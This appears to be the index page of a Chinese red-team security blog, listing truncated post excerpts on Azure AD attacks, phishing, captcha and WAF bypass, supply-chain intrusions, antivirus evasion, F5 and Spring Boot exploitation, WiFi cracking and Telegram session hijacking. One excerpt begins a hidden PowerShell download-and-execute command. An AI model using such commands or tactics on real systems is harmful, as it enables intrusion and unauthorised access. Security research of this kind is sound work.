banner
毅种循环

毅种循环

请将那贻笑罪过以逐字吟咏 如对冰川投以游丝般倾诉

渗透测试

cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

红队视角下的AzureAD攻防(上)

‍ AzureAD/Azure/AD   Azure AD,是微软提供的一种基于云的身份和访问管理 (IAM) 解决方案。它可以帮助组织安全地管理员工、合作伙伴和客户对应用程序和资源的访问。   注:2023 年 6 月 21 日起,Azure AD,现在正式更名为…
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

记一次钓鱼邮件溯源

0X01 接到客户通知,发现疑似一份钓鱼邮件,要求进行研判并且溯源。 邮件大概如下: 0X02 压缩包更改为 EML 之后打开文件,压缩包内容如下: PS:此处的 index.exe 初始状态为 index.sc,为了方便分析这里改掉了原始后缀。其中最主要的可执行文件为…
cover
cover
cover
cover
cover
cover
cover
cover

鉴权验证码如何绕过

0x01 在项目上遇到了一个登陆口,但是有验证码,同时使用了当前验证码的 UUID 进行鉴权,简单来说就是 如果需要爆破登录接口,需要识别验证码的同时携带上本次验证码的 UUID 同时爆破,接口才能返回信息。 样式如下: 0X02 UUID 同时有时间校验 UUID…
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

对一个微信小程序软件的逆向

‍ 0x01 因为最近有反编译微信小程序的需求,用了一个工具发现还不错,但是过了几天弹出了收费需求,感觉验证挺简单的。尝试破解一下。 因为运行之后在主程序上这是一个窗口,我不太懂逆向,根据我能理解的一点知识,我觉得或许能够将这个窗口给 push 掉。 ‍ 0X02 看到文件夹…
cover
cover
cover

CSA CCPTP认证通过分享

1 摘要 云渗透测试认证专家(Certified Cloud Penetration Test Professional, CCPTP)认证与培训项目由国际云安全联盟中华区发布,是全球首个针对云环境渗透测试能力的认证课程,旨在提供针对云计算渗透测试所需的专业实操技能…
cover
cover
cover
cover
cover
cover
cover
cover

利用Cloudflare做二级代理

1 CF 良心的一批! 访问地址:https://1.1.1.1/ 2 为什么有这个想法呢,因为 能白嫖不要给钱 有些站点对 ip 限制的比较死,云厂商的 ip 偶尔是白名单,封 ip 比较快,不想被封而已。 发现 cf 给的 ip 还是比较干净的,相当舒服了。 3 详细设置步骤:…
cover
cover
cover
cover

邮件钓鱼论 之一

记录一次之前的钓鱼。 之前有个甲方开展演练,不限制攻击手法,正巧一般都是硬打进去的,这次正好写一下钓鱼。 很简单,全是基础的东西,轻喷。 0x01 为什么要钓鱼 正常来说,无论是护网还是高级渗透项目,目标肯定是做了好几轮测试的,要从外围找到点,很难。 但是在允许钓鱼的情况下…
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

内网第三方横向突破案例

0X01 攻击链路图 图做的比较密,单独截出几份用于说明选择和目标的方向。 关于供应商的收集 关于供应商的打击链。 关于此次供应商目标的选择。 0x02 入口 入口很简单,一个 Confluence 的漏洞,直接写入内存马。 系统存在 360 全家桶 系统是 2008…
cover
cover
cover
cover
cover
cover

shiro-waf-bypass

‍ 这个 shiro 是有 WAF 的,具体的情况就是找得到 key,但是找不到链。 ‍ 当 key 存在但是找不到链,抓包看看请求。 ‍ 我所知的 shiro bypass 思路就从 rememberMe cookie 的长度,还有就是脏数据填充,waf 会解密…
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

一个供应链突破案例

某护网行动,通过企查查收集到了该单位的招投标信息。 通过对该中标公司进行渗透测试,发现在其 IP 段里面存在一个 Confluence,刚好有漏洞的版本,随即拿下。 ‍ 系统为 2008R2,X64 发现有 360 全家桶,权限 nt authority\network service。…
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

HackTheBox-Nest

HackTheBox-Nest 信息收集 ‍ Copy └─# nmap -sV 10.129.157.43 -p 1-65535 Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-20 22:27 EST Nmap scan…
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

记一次从供应商到目标之旅

‍ 因涉及敏感信息较多,厚码见谅。 最近一段时间有个项目,当时对某个单位目标进行了信息收集,该系统是一个邮件系统。 ‍ 目标:XXX.gov.cn 某个政务级目标 系统:自建的邮件服务系统 ‍ 系统有滑块验证,因此从web爆破邮箱的作用不大,同时…
cover
cover
cover
cover

干掉卡巴斯基后台内存扫描的DLL

BypassKarpersky.zip ‍ 0x01 首先CS需要启一个powershell, powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http…
cover
cover
cover
cover

CVE-2022-1388 F5 BIG-IP未授权RCE漏洞&写Webshell

漏洞描述 漏洞描述: 在 F5 BIG-IP 16.1.x 16.1.2.2 之前的版本、15.1.5.1 之前的 15.1.x 版本、14.1.4.6 之前的 14.1.x 版本、13.1.5 之前的 13.1.x 版本以及所有 12.1.x和 11.6.x 版本…
cover
cover
cover
cover
cover
cover

Spring Boot Dump文件转储利用

日常测试或攻防演练中像shiro,fastjson等漏洞已经越来越少了,但是随着spring boot框架的广泛使用,spring boot带来的安全问题也越来越多,本文仅介绍未授权现在heapdump获取数据库口令,达到连接数据库的目的。其他spring…
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

我偷他的网

> 本文章仅作为技术学习交流,请不要随意拿邻居开刀。 提前准备 你需要如下材料 - 一个支持监听的无线网卡设备 - 一个强大的WiFi字典 - 一个有WiFi的地方 最近流量不够用了,想着偷个网试试,看了一下周边的WiFi布局。。 还是有一些WIFI设备的…
cover
cover
cover
cover
cover
cover
cover

telegram session hijacking

2018年5月16日,Talos发表了关于Telegrab的一篇文章,介绍了可以劫持Telegram会话的恶意软件。原理非常简单:如果攻击者可以复制桌面用户的会话令牌(session token),那么就能劫持会话。除了本地存储的信息外,攻击者不需要其他任何信息…
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

Burp验证码爆破

项目地址:https://github.com/f0ng/captcha-killer-modified 识别库: https://github.com/sml2h3/ddddocr ‍ 0x01 安装 前置条件:安装dddocr. pip3 install ddddocr…
Ownership of this blog data is guaranteed by blockchain and smart contracts to the creator alone.